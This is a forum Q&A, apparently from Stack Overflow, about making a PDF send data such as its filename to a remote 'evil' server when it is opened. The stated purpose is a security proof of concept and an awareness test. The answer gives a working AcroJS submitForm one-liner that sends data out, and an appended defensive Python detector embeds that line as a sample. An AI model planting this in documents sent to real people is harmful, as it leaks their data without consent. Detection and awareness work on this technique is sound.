Send GET requests from a PDF file










-1















I'm currently working on a security proof of concept where I need to show the danger of opening an unknown PDF file.

The Internet says that much malware uses JavaScript in PDF documents (AcroJS) to download its malicious payload.

My PoC is based on a victim who will demonstrate a data leak caused by opening a PDF file. I only need to send the filename over the Internet. I can write JavaScript code which launches at document opening, but the Net.HTTP.request function can only be used in a trusted context.

So I don't see how to make a GET request to my listening "evil" website.

I read that sometimes hackers use vulnerabilities in Acrobat to do their damage, but many places talk about the native ability of AcroJS to permit GET requests.

Does anyone know how to do a one-way GET request (the answer of the server is not even interesting in this case)?

Maybe there is a way to include a remote (non-existent) picture so the PDF will make a GET request to the specified URL.

Or something like this.

Thanks for your help. I know this is really close to security concerns, but I think the answer needs AcroJS skills (which are rare in the security community).

Thanks



























  • 1





    Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.

    – joelgeraci
    Nov 15 '18 at 0:05











  • Okay, opening a link in the browser is perfect for me. How do I do that?

    – Sibwara
    Nov 15 '18 at 8:42











  • And how to execute a GET with the user interaction (it could be interesting to test awareness on this point, like for macros in Word)?

    – Sibwara
    Nov 15 '18 at 9:14















javascript pdf acrobat
















asked Nov 14 '18 at 23:29









Sibwara

1 Answer


















0














Okay, I found a way by using:

this.submitForm("http://mydomain.fr/var="+thedataIwant);

The user is prompted about an HTTP connection attempt, but this is the vigilance I want to test for.

The articles of this guy helped me a lot: https://acrobatusers.com/tutorials/author/parker






answered Nov 15 '18 at 17:18

Sibwara
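
A defender-side triage check for the technique this thread ends on (an added example, not part of the original posts): it flags a PDF whose open-time JavaScript can contact a remote host, even when the name is hex-escaped or the script sits in a Flate-compressed stream. The function names, the `launchURL` pattern and the sample fragment are assumptions constructed here; `submitForm`, `Net.HTTP.request` and the URL are taken from the thread.

```python
import re
import zlib

# PDF names tied to what the thread discusses: scripts run on open, form submission, links.
NAMES = ("/OpenAction", "/AA", "/JavaScript", "/JS", "/SubmitForm", "/URI")
CALL_RE = re.compile(rb"(submitForm|launchURL|Net\.HTTP\.request)\s*\(")
URL_RE = re.compile(rb"https?://[^\s\"'()<>\\]+")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)

def _unescape(data):
    # Names may be written with #xx hex escapes (/J#61vaScript is /JavaScript).
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def _inflate_streams(data):
    # Script source usually sits in a Flate-compressed stream, invisible to a plain grep.
    out = []
    for body in STREAM_RE.findall(data):
        try:
            out.append(zlib.decompressobj().decompress(body))
        except zlib.error:
            pass  # not Flate data; uncompressed streams are already covered by the raw scan
    return b"\n".join(out)

def triage_pdf(data):
    """Report indicators that a PDF may contact a remote host when opened."""
    text = _unescape(data) + b"\n" + _inflate_streams(data)
    names = {}
    for n in NAMES:
        hits = len(re.findall(re.escape(n.encode()) + rb"(?![A-Za-z])", text))
        if hits:
            names[n] = hits
    trigger = "/OpenAction" in names or "/AA" in names
    script = "/JS" in names or "/JavaScript" in names
    return {
        "names": names,
        "calls": sorted({c.decode() for c in CALL_RE.findall(text)}),
        "urls": sorted({u.decode("latin-1") for u in URL_RE.findall(text)}),
        "auto_js": trigger and script,
    }

# Constructed fragment (not a complete PDF) embedding the one-liner from the answer above.
_JS = b'this.submitForm("http://mydomain.fr/var="+thedataIwant);'
SAMPLE = (
    b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /S /J#61vaScript /JS 3 0 R >>\nendobj\n"
    b"3 0 obj\n<< /Filter /FlateDecode >>\nstream\n" + zlib.compress(_JS) + b"\nendstream\nendobj\n"
)

if __name__ == "__main__":
    print(triage_pdf(SAMPLE))
```

Streams using filters other than Flate, object streams and encrypted documents need a full PDF parser; a clean result from this scan only means nothing was found in the raw bytes and Flate streams.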
